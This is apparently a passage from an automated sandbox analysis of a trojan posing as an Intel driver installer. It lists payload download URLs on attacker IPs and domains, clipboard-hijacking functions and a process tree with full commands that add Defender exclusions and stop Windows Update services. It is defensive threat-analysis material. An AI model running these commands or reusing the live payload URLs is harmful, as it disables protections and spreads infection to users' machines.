0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drString found in binary or memory: http://185.215.113.66/
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/10Y
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/11
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/19YW
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1LMEM0xHm
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1r
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1s
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000770000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/3ZY
Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/3~Y
Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/FYL
Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/der
Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.dr | String found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189021748.000000000019A000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/pei.exe
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/pei.exe(
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.000000000289D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/pei.exeQQC:
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/pei.exei
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/pei.exep
Source: sysppvrdnvs.exe | String found in binary or memory: http://185.215.113.66/tdrp.exe
Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.dr | String found in binary or memory: http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.dr | String found in binary or memory: http://91.202.233.141/
Source: sysppvrdnvs.exe, 00000004.00000002.2523875975.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2525738269.0000000005D8D000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntbl
Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntblZ
Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntbll
Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntbltwork
Source: thcdVit1dX.exe | String found in binary or memory: http://appsyndication.org/2006/appsyn
Source: thcdVit1dX.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: thcdVit1dX.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: thcdVit1dX.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: thcdVit1dX.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: thcdVit1dX.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: thcdVit1dX.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: thcdVit1dX.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: thcdVit1dX.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: thcdVit1dX.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: thcdVit1dX.exe | String found in binary or memory: http://ocsp.sectigo.com0#
Source: 71384504.exe.2.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 71384504.exe.2.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/newtpp.exe
Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/newtpp.exe:
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.dr | String found in binary or memory: http://twizt.net/newtpp.exeP0
Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/newtpp.exek
Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/newtpp.exes
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.dr | String found in binary or memory: http://twizt.net/peinstall.php
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.dr | String found in binary or memory: http://twizt.net/peinstall.php%temp%%s
Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/peinstall.phpQZ
Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/peinstall.phpshqos.dll.mui
Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/peinstall.phpystem32
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: thcdVit1dX.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.71384504.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.71384504.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 71384504.exe PID: 7464, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 8108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 2658326577.exe PID: 1400, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\2658326577.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\71384504.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_0040FB45 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_0040FB45 NtQueryVirtualMemory
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040FB45 NtQueryVirtualMemory
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Code function: 18_2_00007FF848930685 NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Code function: 18_2_00007FF848930690 NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Code function: 18_2_00007FF848930F11 NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | File created: C:\Windows\sysppvrdnvs.exe
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041302B
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004440C6
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0043D0DA
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0045F10B
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004641A8
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00423268
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0043E293
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004153DD
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00420480
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004575EC
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00448749
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0040AC60
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0045EC60
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00410ED9
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004084D0
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004084F9
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_00404090
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_0040AEB0
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_00404970
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_0040F908
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_004084D0
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_004084F9
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_00404090
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_0040AEB0
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_00404970
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_0040F908
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_004084D0
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_004084F9
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00404090
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040AEB0
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00404970
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040F908
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\2355412914.exe 5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: String function: 0040129E appears 871 times
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: String function: 0040BA47 appears 83 times
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: String function: 00452000 appears 33 times
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: String function: 004012A1 appears 1445 times
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: String function: 0046B18E appears 94 times
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: String function: 00403578 appears 64 times
Source: 2355412914.exe.4.dr | Static PE information: No import functions for PE file found
Source: thcdVit1dX.exe, 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: bOriginalFilenameIntel-Driver-and-Support-Assistant-Installer.exedDProductNameIntel vs thcdVit1dX.exe
Source: thcdVit1dX.exe | Binary or memory string: bOriginalFilenameIntel-Driver-and-Support-Assistant-Installer.exedDProductNameIntel vs thcdVit1dX.exe
Source: thcdVit1dX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: classification engine | Classification label: mal100.troj.evad.winEXE@41/21@1/10
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004035CE FormatMessageW,GetLastError,LocalFree
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00466838 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0046F128 CLSIDFromProgID,CoCreateInstance
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00470DEA FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004445B2 ChangeServiceConfigW,GetLastError
Source: C:\Users\user\Desktop\thcdVit1dX.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Mutant created: NULL
Source: C:\Windows\sysppvrdnvs.exe | Mutant created: \Sessions\1\BaseNamedObjects\mmn7nnm8na
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Users\user\Desktop\thcdVit1dX.exe | File created: C:\Users\user\AppData\Local\Temp\4BBF.tmp
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: cabinet.dll (0_2_00401121)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: msi.dll (0_2_00401121)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: version.dll (0_2_00401121)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: wininet.dll (0_2_00401121)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: comres.dll (0_2_00401121)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: 8xG (0_2_00401121)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: PxG (0_2_00401121)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Command line argument: hxG (0_2_00401121)
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | System information queried: HandleInformation
Source: C:\Windows\sysppvrdnvs.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: thcdVit1dX.exe | ReversingLabs: Detection: 65%
Source: thcdVit1dX.exe | Virustotal: Detection: 61%
Source: thcdVit1dX.exe | String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: thcdVit1dX.exe | String found in binary or memory: bOriginalFilenameIntel-Driver-and-Support-Assistant-Installer.exedDProductNameIntel
Source: C:\Users\user\Desktop\thcdVit1dX.exe | File read: C:\Users\user\Desktop\thcdVit1dX.exe
Source: unknown | Process created: C:\Users\user\Desktop\thcdVit1dX.exe "C:\Users\user\Desktop\thcdVit1dX.exe"
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Process created: C:\Users\user\AppData\Local\Temp\4BBF.exe "C:\Users\user\AppData\Local\Temp\4BBF.exe"
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Process created: C:\Users\user\AppData\Local\Temp\71384504.exe C:\Users\user\AppData\Local\Temp\71384504.exe
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Process created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\sysppvrdnvs.exe "C:\Windows\sysppvrdnvs.exe"
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Users\user\AppData\Local\Temp\2355412914.exe C:\Users\user\AppData\Local\Temp\2355412914.exe
